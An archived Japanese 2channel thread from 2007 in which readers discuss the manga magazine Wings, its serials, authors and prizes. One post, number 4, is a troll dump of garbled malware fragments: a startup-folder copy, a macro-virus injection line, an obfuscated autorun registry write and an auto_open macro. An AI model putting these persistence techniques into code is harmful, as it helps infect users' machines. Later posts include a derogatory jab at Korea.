2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

新書館 Wings 7冊目

1 :花と名無しさん:2007/10/28(日) 01:06:08 ID:???0
新書館から発行されている雑誌「Wings」のスレです。
毎月28日発売。
「ウンポコ」の話もこちらでどうぞ。
ディアプラスはBL誌なので、別板でお願いします。

前スレ
新書館 WINGS 6冊目
http://anime2.2ch.net/test/read.cgi/gcomic/1143381371/

2 :花と名無しさん:2007/10/28(日) 01:07:30 ID:???0
新書館 WINGS 5冊目
http://comic6.2ch.net/test/read.cgi/gcomic/1109594011/
☆新書館 WINGS 4冊目☆
http://comic6.2ch.net/test/read.cgi/gcomic/1065192462/
☆新書館 WINGS 3冊目☆
http://comic.2ch.net/test/read.cgi/gcomic/1026213927/
新書館WINGSU
http://comic.2ch.net/gcomic/kako/993/993054196.html
新書館WINGS
http://salad.2ch.net/gcomic/kako/979/979722472.html
WINGS
http://mentai.2ch.net/gcomic/kako/963/963678036.html

3 :花と名無しさん:2007/10/28(日) 03:42:51 ID:???0
なんとなく作ってみた12月号テンプレ

少年魔法士:
学園天国:
天使祝詞:
コンプ31:
配達:
神狗:
いばらとげ:
サムライ:
マルチナ:
隠れ鬼:
ヒキ:
QP:
魔法娘:
ドラ騎士外伝:
宇宙海賊:
冥:
非常:
ハッピィ:
美しい:
メトセラ:
蜘蛛:
ねこ:

4 :花と名無しさん:2007/10/28(日) 05:35:29 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/10/28(日) 08:32:58 ID:???0
1乙

6 :花と名無しさん:2007/10/28(日) 09:52:47 ID:???0

いつのまにか前スレおちてたね

7 :花と名無しさん:2007/10/28(日) 10:52:23 ID:???O
980越えてるのに丸一日レスがつかなかったからね
進みが遅いから自分もうっかりしてた

>>1おつ

8 :花と名無しさん:2007/10/28(日) 12:31:03 ID:???0
>>1


発売日すぎても新スレ立たないからもうオワタかと思った
そういう自分も12月号はまだゲットしてない
公式見て1月号はコランタン号の読みきり?が載るみたいで楽しみ

9 :花と名無しさん:2007/10/28(日) 14:08:30 ID:???0
        *、 *、      。*゚    *-+。・+。-*。+。*
        / ゚+、 ゚+、   *゚ ・゚    \       。*゚
       ∩    *。  *。    +゚    ∩    *
   (´・ω・`)      +。   +。   ゚*     (´・ω・`)
   と   ノ      *゚  *゚    ・     。ヽ、  つ
    と、ノ     ・゚  ・゚     +゚    *  ヽ、 ⊃
     ~∪    *゚  *゚      *    +゚    ∪~   ☆
          +′ +′      +゚   ゚+。*。・+。-*。+。*゚

10 :花と名無しさん:2007/10/28(日) 16:48:34 ID:???0
なんだこれはwwww

11 :花と名無しさん:2007/10/28(日) 18:20:27 ID:???0
今月号の読者コメント投稿を何気なく見てみたんだけど、
丘の上のバンビーナの感想への編集のコメント、先走ってるw
今月載ってないんですけどwww

12 :花と名無しさん:2007/10/28(日) 18:24:26 ID:???O
前スレで話題になってた象の背中のコミカライズ、13作ってスゲーなww

結局御徒町さんは例の新人競作読み切りで一位をとって
象の背中(新連載)を任されたってことでいいのかな?
17歳の寝室好きだし嬉しかったけど、次はオリジナルが読みたいなぁ
象の背中もよかったけどね

13 :花と名無しさん:2007/10/28(日) 18:31:39 ID:???0
>11
それ私も見て噴いた。
予想できる展開とはいえ、編集部がネタバレしてどうすんのwww

14 :花と名無しさん:2007/10/29(月) 17:50:08 ID:???0
2002年のウィングスの看板作家
◎つだみきよ
◎なるしまゆり
◎ねぎしきょうこ
◎よしながふみ
◎押上美猫
◎高橋冴未
だいぶ入れ替りしたな

15 :花と名無しさん:2007/10/29(月) 18:10:11 ID:???0
ねぎしさん、ちゃんと描いているイメージ無かったが、看板だったのか。
よしながさん、また描いてくれないかなあ。

16 :花と名無しさん:2007/10/29(月) 18:29:34 ID:???0
看板とか作家の扱いとかばかり気にしてるレスって何なんだろう・・・
別に、自分の好きな人がちゃんと載ってたり描いてたりすれば
それでいいじゃんって思うんだけど・・・

17 :花と名無しさん:2007/10/29(月) 18:31:48 ID:???0
関連作家、作品スレ
意外とあるね。抜けあったら、補足よろ

つだみきよ(蔵王大志)・影木栄貴 NameVol4.
ttp://anime2.2ch.net/test/read.cgi/gcomic/1147998481/

【韓国漫画】らぶきょん=宮(クン)【パク・ソヒ】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1181980483/l50

**よしながふみスレPart18**
ttp://anime2.2ch.net/test/read.cgi/gcomic/1183252012/l50

【冥のほとり】高橋冴未【きらきら馨る】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1180857270/l50

川添真理子さんを語ろう
ttp://anime2.2ch.net/test/read.cgi/gcomic/1066138369/l50


読後は2chで… なるしまゆり 17
ttp://anime2.2ch.net/test/read.cgi/gcomic/1189858110/l50


18 :花と名無しさん:2007/10/29(月) 18:32:18 ID:9FAydrK30
【魔法使いの娘】那州雪絵その13【グリーンウッド】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1165495423/l50

【カルバニア物語】TONO☆11【チキタ★GUGU】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1188725426/l50

鉄錆廃園 ←華不魅スレ
ttp://anime2.2ch.net/test/read.cgi/gcomic/1059550905/l50

★☆碧也ぴんく☆★
ttp://anime2.2ch.net/test/read.cgi/gcomic/1143548634/l50

押上美猫 Vol.7 −異界篇−
ttp://anime2.2ch.net/test/read.cgi/gcomic/1182165792/l50

【ギョーザがない】佐久間智代☆3【ありえない】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1109768002/l50

■再始動 橋本みつる■
ttp://anime2.2ch.net/test/read.cgi/gcomic/1075994298/l50


19 :花と名無しさん:2007/10/29(月) 18:59:00 ID:???0
●○● 尾崎 かおり ●○●
ttp://anime2.2ch.net/test/read.cgi/gcomic/1057218221/l50

【ばらいろ】あとり硅子【すみれいろ】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1098284363/l50


20 :花と名無しさん:2007/10/30(火) 21:17:06 ID:???0
投稿したんだけど、今号発表のはずなんだが…。
一次審査さえ通過しなかった…のかな?
来月に回ってたりとかあるのかなぁ。


21 :花と名無しさん:2007/10/30(火) 22:09:42 ID:???0
ひとり言ならチラシの裏にでも書いていてください

22 :花と名無しさん:2007/10/31(水) 05:01:19 ID:???0
>>20
つ 業界板http://anime2.2ch.net/iga/

23 :花と名無しさん:2007/10/31(水) 10:55:07 ID:???0
(´・ω・`) どうも場所を間違えたようで申し訳なかった。
     あちら側へ逝ってくる。

24 :花と名無しさん:2007/10/31(水) 16:15:51 ID:???0
ネムキを置いてる本屋にも
置かれなくなってた
dear+はあるのに・・・

25 :花と名無しさん:2007/10/31(水) 19:55:30 ID:???0
自分の勤めてるスーパーの本屋
ウンポコは入るのにWingsは入りません。

26 :花と名無しさん:2007/11/03(土) 23:08:56 ID:???0
hosyu

27 :花と名無しさん:2007/11/03(土) 23:57:44 ID:/wkkAmqU0
>22
WINGS投稿者スレってあるの?

>24-25
駅前にTUTAYAが出来たんだが、ウンポコは入ってるのにWINGS入らなかった。
大丈夫なのかなあ。アンケプレゼントの図書カードも5名様だけだし。

でもって、来月、本体価格がとうとう720円だよ。月刊誌の値段じゃないよな。
今は読み応えあるが、レギュラー陣減ったら買うの悩むな。

28 :花と名無しさん:2007/11/04(日) 16:22:10 ID:???0
テンプレせっかく作ってくれたので書いてみる
>3乙
少年魔法士:久しぶりに読み応えがあった。しかし、ペンタッチが荒くて絵が恐い。
学園天国: 新キャラはテンプレな腹黒眼鏡か。
天使祝詞: 後始末どうすんだろ。血はおちにくいぞ。
コンプ31: 初初しいが、オチが…。周りでやられたらウザイだろうな。
配達: 営業さんいい人だ。次で終わるのが残念。
神狗: 写真こわ。家庭教師も何かありそう。
いばらとげ: 単なる俺女だと思ってたが、一応理由があったのか。父親イタイな。
サムライ: なんかあっさり謎が解けたような。次で何かあるのかな。
マルチナ: メイドと恋仲なら、もうちょい伏線が欲しいような。
隠れ鬼: 絵が意外と平安時代にあってるね。続きが見たい。
ヒキ: 恐いな。そのうち父親も犠牲になったり?
QP: そりゃあママもストレス溜まるだろう
魔法娘: 変質者の方が恐かったな。あのまま、あの世で因果応報?
ドラ騎士外伝:チビな二人は可愛いが、あっさり決めていいのか。
宇宙海賊: 海行かないのか。ホラー特集が続いてるようだ。
冥: 蒼天王の目的は伯天王復活?
非常: 土用の丑の日キター!絵師いなくなったら、やばそうだな。
ハッピィ: オータムナル飲みたくなった。
美しい: 途中切なかったのに、ホノボノな感じで終わるとは。
メトセラ: ユカが弱くなっていて意外だった。
蜘蛛: 知人を解剖するのはきつくないか?
ねこ: 猫が下手。シャムに見えない。話は良かった。

29 :花と名無しさん:2007/11/05(月) 10:36:28 ID:???0
来月の韓国の漫画新連載って…実験的だな
最近クライマックスの作品多いし
入れ替えの時期なんだろうけど長く続きそうなのにしてくれ

30 :花と名無しさん:2007/11/06(火) 02:22:44 ID:???0
最近、巻頭カラーでハデに始まった漫画って
途中止めでいつの間にかいなくなってたり
ちっとも盛り上がらないまま短く終わるの多くない?

31 :花と名無しさん:2007/11/06(火) 08:57:49 ID:???0
本屋のも川添さんんのも巻頭カラーだったのに
次で終わりなんだよね

32 :花と名無しさん:2007/11/06(火) 09:28:29 ID:???0
人気が出なかっただけじゃないの?
飛翔の連載でもそんなのがどんなに多いか…


33 :花と名無しさん:2007/11/06(火) 19:33:12 ID:???0
ぱっと見の絵だけ綺麗でも話がつまんなかったら人気も出ねーべ

34 :花と名無しさん:2007/11/06(火) 22:15:03 ID:???0
ねぎしさんの「ひみつで〜」は一回しか連載されてない…。
もう終わりか?

35 :花と名無しさん:2007/11/06(火) 22:23:15 ID:???0
>>33
つだみきよとかぱっと見の絵だけのつまんねー話しか書いてないけどそこそこ人気だべ

36 :花と名無しさん:2007/11/07(水) 03:31:50 ID:???0
金色スイスさんも巻頭カラーで始まったのにもう描いてないよ?
実は人気とか関係なくて、話を考えずに始めるから続かない
人が多いだけなんじゃないのと疑ってみたりする。
ねぎしさんのなんて特にそんな感じだった。

サムライは結局何がしたかったのか分らなかったなあ。
赤ずきんはもっと続くのかと思ったのでびっくり。

37 :花と名無しさん:2007/11/07(水) 10:33:24 ID:???0
つだのはなんとなく10代に受ける理由分かる気がする
よみやすくてわかりやすい
引っ張り方もまあまあうまい
原作付の2本は最初から短期連載のつもりだったのかな
新田と立野はなんかまだまだつづきそう
来月アリスは再開するみたいだが

38 :花と名無しさん:2007/11/07(水) 13:54:33 ID:???0
全体的に今のWINGSの編集の方針かなんかであまり長期連載を
しないようにしているのかと思った
ウンポコのほうが連載多いんじゃないかってくらいw
なんか自己満足的に話がわかりにくいのが多くて入り込めないものは
そのままスルーになっちゃってるなー最近
つだのとか新連載の1回目で挫折した

そういえば次の文庫は栄木だったな
正直そこまで出す価値も無いと思うんだけど
とリビアの時に刷った分、掃けたのかなー?
描かない作家に印税やるために文庫化するように見えるよ

39 :花と名無しさん:2007/11/07(水) 16:20:15 ID:???0
来月からのもすぐに終わるかもしれない
なんか連載陣が安定してない
だから部数が下がるんだろうな

40 :花と名無しさん:2007/11/07(水) 17:29:17 ID:???0
長期連載できる能力のある作家がウィングスには少ない印象。

41 :花と名無しさん:2007/11/07(水) 23:27:33 ID:avjt3L+k0
>20 >27
新書館投稿者用スレッド立てたよ。

[WINGS]新書館関係投稿者スレ[ウンポコ]
ttp://anime2.2ch.net/test/read.cgi/iga/1194445501/l50


42 :花と名無しさん:2007/11/08(木) 15:02:46 ID:???0
10巻以上も続くような長期連載じゃなくていいんだけど、ハデに巻頭ではじまって
たいした展開も無く1巻だけで終わると激しく肩透かしを食らう気がする。

だらだら続く長期連載がいいとは全然思わないけど、短すぎて
何がしたかったのかとか、キャラの性格すら把握できないうちに終わるのも
とてもじゃないけど面白いとは思えない。

途中止めのは問題外。

43 :花と名無しさん:2007/11/08(木) 15:11:31 ID:???0
魔法使いの娘は長い方かな。
あれは何巻まで続くかねえ。

44 :花と名無しさん:2007/11/08(木) 15:14:42 ID:???0
少年魔法士
魔法使いの娘
メテオ・メトセラ
思いついただけの長期連載を挙げてみた
WINGSには毎月一定枚数を描ける作家が足りないんだよな

45 :花と名無しさん:2007/11/08(木) 16:14:27 ID:???0
>>44
おいおい、大長編のパーム(40巻超え?)とファザード(14巻)を忘れてますよw
シリーズ連載だと鬼外も長期。通巻20冊ぐらい?

46 :花と名無しさん:2007/11/08(木) 16:21:05 ID:???0
パームはこの前30巻ぐらいがでたんじゃなかった?
高橋さんのも長編だよな


47 :花と名無しさん:2007/11/08(木) 21:48:13 ID:???0
魔法使いってそんな長いか?

48 :花と名無しさん:2007/11/09(金) 08:56:11 ID:???0
長い、をどう捉えるかによる。
休み入れながら書いてるから期間としては長い。単行本数は10巻に満たない。
ってところだな。

49 :花と名無しさん:2007/11/09(金) 10:04:18 ID:???0
フラワーもプリンセスもドラ騎士も終わった
なのに次の看板候補が出てこない
ウィングスは人気出た漫画を無理に引き伸ばさないけど
新人を発掘するのは下手なのかな

50 :花と名無しさん:2007/11/09(金) 12:55:59 ID:???0
>>49
それは看板の捉え方によるかも。
ウィングスってもともと複数看板のところだし、今もそうなんじゃない?
カリスマ的な看板ならがゆんクランプを最後に出てないと思うんだが。

51 :花と名無しさん:2007/11/10(土) 02:15:36 ID:???O
表紙に惹かれて101人目のアリスを買って読んでみたんだが
これっぽっちも面白いと思えなかった
このマンガは人気あるのか?

52 :花と名無しさん:2007/11/10(土) 05:05:23 ID:???0
>>51
自分は好きだよー本誌で読んでたから単行本買うかは未定だけど。
話の盛り上がりに欠ける感はあったけど、それは話が始まったばかり
だからか、単に雰囲気重視の漫画だからかはわからないw


53 :花と名無しさん:2007/11/10(土) 10:47:40 ID:???O
一昨日、やっとフラワーオブライフの図書カードが届いた。
約一年前の賞品じゃん…もう、とっくに懸賞の存在なんか忘れてたんで驚いたよ。
ウィングスっていつもこんなに賞品届くの遅いの?

54 :花と名無しさん:2007/11/11(日) 00:36:04 ID:???0
図書カード、当選発表後数ヶ月経過で電話で問い合わせたよ・・・
そうしたら作成の都合上か何かで、まとめて作るんだって。
自分の時は半年程で届いたよ。

55 :花と名無しさん:2007/11/11(日) 01:01:23 ID:???0
要は作成会社への注文枚数がある程度多くないと(100枚単位とか)
発注できないということでしょう
それって作成してから懸賞に出せよって話だよね

56 :花と名無しさん:2007/11/11(日) 14:44:18 ID:???0
どこかで尾崎さんと鈴木さんが投稿出身って読んだんだけど
夢かな?

57 :花と名無しさん:2007/11/11(日) 18:13:46 ID:???0
尾崎さんは93年に投稿でデビュー
鈴木さんもそうじゃない?

58 :花と名無しさん:2007/11/11(日) 22:49:29 ID:???0
サンクス。夢ではなかった。投稿者スレで読んだんだった

59 :花と名無しさん:2007/11/19(月) 18:50:17 ID:???O
最近の獣木さんはどうでしょう?
いつの間にか単独スレなくなってしまったのね。

60 :花と名無しさん:2007/11/19(月) 18:58:01 ID:???0
道原さんもいなくなってしまったしな。

61 :花と名無しさん:2007/11/19(月) 19:04:37 ID:???0
なんでそんなに獣木さんの単独スレが気になるんだ

62 :花と名無しさん:2007/11/21(水) 22:47:14 ID:???0
>>59
獣木の公式チェックしてる?

「シリーズは主に初版のみの出版です。
巻によっては発売直後に絶版状態となっていますので、
お早めにお求めください。」
とあったので、あぜんとした。

63 :花と名無しさん:2007/11/22(木) 01:23:16 ID:???0
とほほ

64 :花と名無しさん:2007/11/22(木) 01:39:39 ID:???0
>59
再版は営業が決める物みたいだが、作者が止めてるって発言でもあったの?
パームは文庫も出てるし、再版しないのは仕方ないんでは?

65 :花と名無しさん:2007/11/28(水) 02:26:42 ID:???0
本日ウィングス発売日です

66 :花と名無しさん:2007/11/28(水) 20:06:09 ID:DYU/wlPoO
パームってこのシリーズで終わりなの?

つーかスレがない…

67 :花と名無しさん:2007/11/28(水) 22:19:57 ID:???0
>66
パームは前スレの最後、随分刺々しい、もしくは諦めに満ちた空気になってたから…
次スレを誰も言い出さなかったような記憶<思い違いかもしれん。自信なし
専スレあっても多分あまりレスが付かないか、前スレの二の舞になると思う
ちなみに、蜘蛛は最終話の一つ前。最終話は「TASK」だよ

68 :花と名無しさん:2007/11/29(木) 16:54:04 ID:JCd0rmbvO
>>67
そうなんですか!ありがとうございます

蜘蛛の紋様が始まっらパームは終わる…と書いてあったので、てっきりそう思ってました

69 :花と名無しさん:2007/11/29(木) 17:16:16 ID:???0
あの附録、いつまで続くんだろう。
ずっとあんな感じの微妙なレベルの作品が続くのかな…

70 :花と名無しさん:2007/11/29(木) 23:37:40 ID:UI8Iw95A0
韓国の漫画家使うのは勝手だけど、日本で載せるなら右閉じで描かせろとオモタ。

71 :花と名無しさん:2007/11/30(金) 01:57:15 ID:???0
読みにくい上に、話がよくわからなかった、韓国の漫画。
何よりも今月号厚すぎ。あの厚さを想定せずに手にとったら
親指つりそう&落としそうになった。


72 :花と名無しさん:2007/11/30(金) 21:45:35 ID:???0
あんなに厚くても読ませる話は少ないなぁ…

73 :花と名無しさん:2007/11/30(金) 22:29:34 ID:???0
連載作品を5本くらい削って、読み切りを1〜2本追加。そんでもって
表紙もあんなに厚い紙じゃなくていいから、定価500円以下になんないかなー
なんだかんだと連載作品が多いんだよね。でも680円の価値はないと思う

74 :花と名無しさん:2007/11/30(金) 23:21:18 ID:???0
>>73
したらたぶんつまんないか落とすばかりの連載が残る気ガス

75 :花と名無しさん:2007/12/01(土) 04:57:58 ID:???O
話豚切りですみませんが、水月博士さんはもう活動してないんですか?

76 :花と名無しさん:2007/12/03(月) 14:14:29 ID:???0
オロロンの人か。最近見てないような気がします

韓国漫画、話に脈絡がなさすぎて吹いたwww
どっかから持ってきたものをぶつ切りでつなぎ合わせてる感じ。
怖くないとかナウシカすぎてワロタ

魔法使いの娘、兵吾って主人公殺人未遂以前にも前科あったのか
でも最近萌え始めてしまった 今回切なかった

77 :花と名無しさん:2007/12/03(月) 16:52:04 ID:???0
韓国のやつ、話に脈絡が無いのに自分も吹いた+モンスター?の
外見に笑いが止まらなかったwwwwwww
あと、戦いの内容がなぞだよね、能力も。純粋に力が勝敗を左右するなら、
戦いに入った瞬間に方がつくじゃん?

78 :花と名無しさん:2007/12/04(火) 00:18:08 ID:???0
斜め上の国に一般常識は通用しません。

79 :花と名無しさん:2007/12/04(火) 01:42:19 ID:???0
韓国漫画、こんなのに金払うぐらなら(韓国ドラマのようにぼったくられてそうだ)
賞金上げるとか、スポンサーになって作品アニメ化するとかすれば、
もう少し売り上げのびるんでは?

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)